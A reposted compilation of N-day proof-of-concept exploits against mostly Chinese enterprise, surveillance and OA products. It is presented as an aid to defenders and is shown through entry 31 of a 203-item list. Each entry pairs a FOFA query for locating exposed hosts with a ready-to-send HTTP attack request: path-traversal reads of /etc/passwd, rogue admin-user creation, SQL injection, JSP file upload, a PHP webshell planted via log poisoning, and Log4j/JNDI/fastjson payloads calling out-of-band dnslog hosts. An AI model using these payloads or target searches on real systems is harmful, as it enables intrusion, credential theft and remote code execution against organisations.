Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted on 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is sourced from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive-defensive exercises. We hope this article helps the defending side; defenders can use its contents to check their own exposure.

Vulnerability sources: this article covers 203 POCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Security patches: all of these vulnerabilities are publicly known; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few overly long POCs are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: if the content of this article infringes on any party's legitimate rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement

To simplify things and make browsing easier, there is no "reply to see the full list" gate. This article is the most complete version available; press F12 and search for keywords when using it.

Bookmark this article if you need it. You can also follow the official account (网络安全新视界).
Table of Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT integrated management platform arbitrary file read
21. 大华ICC intelligent IoT integrated management platform random remote code execution
22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视 HD intelligent recording and broadcasting system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue combat dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle-mounted positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical browsing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet access behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit system assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC List

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user addition
FOFA: title="EasyCVR"

Replace the password value with the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the admin backend with the default account admin, send the following request:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies first.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: plants the function, which executes a command passed base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. 用友NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. 用友NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
